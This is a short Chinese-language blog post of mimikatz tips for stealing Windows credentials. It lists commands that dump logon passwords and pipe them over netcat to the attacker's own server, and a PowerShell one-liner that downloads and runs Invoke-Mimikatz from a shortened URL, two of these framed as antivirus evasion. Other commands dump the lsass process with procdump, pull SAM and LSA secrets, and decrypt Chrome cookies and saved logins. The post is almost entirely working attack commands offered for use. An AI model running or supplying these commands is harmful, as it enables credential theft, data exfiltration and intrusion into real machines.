mimikatz使用技巧

mimikatz平时一般使用技巧

非交换式

打印(输出)mimikatz执行过程的log

1
mimikatz.exe ""privilege::debug"" ""log sekurlsa::logonpasswords full"" exit && dir

读取的密码导出在mimikatz的目录,然后用webshell 将log文件copy到web下,在线访问

1
mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit >> log.txt

nc到vps

非交互抓明文,不留任何文件,直接把抓取结果用nc发到指定的远程机器(一般是自己的vps)上,可能有些端口出不来,换几个常用的即可,80,8080,443,53……

1
2
mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit | nc -vv 192.168.3.251 1234 在目标机器上执行
nc -lvp 1234 本地(vps上)机器执行

两种免杀方式

使用powershell

1
powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds"

Tips:powershell 默认windows visa后才有。也可以将结果发送到vps上。

procdump lsass 进程导出

1
2
C:\temp\procdump.exe -accepteula -ma lsass.exe lsass.dmp //For 32 bits
C:\temp\procdump.exe -accepteula -64 -ma lsass.exe lsass.dmp //For 64 bits
  • 本地使用mimikatz还原
    1
    2
    3
    mimikatz.exe
    sekurlsa::minidump lsass.dmp
    sekurlsa::logonPasswords full

获取vpn密码

1
mimikatz.exe privilege::debug token::elevate lsadump::sam lsadump::secrets exit

浏览器密码

1
2
mimikatz.exe privilege::debug log "dpapi::chrome /in:%localappdata%\google\chrome\USERDA~1\default\cookies /unprotect" exit
mimikatz.exe privilege::debug log "dpapi::chrome /in:%localappdata%\google\chrome\USERDA~1\default\LOGIND~1" exit //读chrome密码
!坚持技术分享,您的支持将鼓励我继续创作!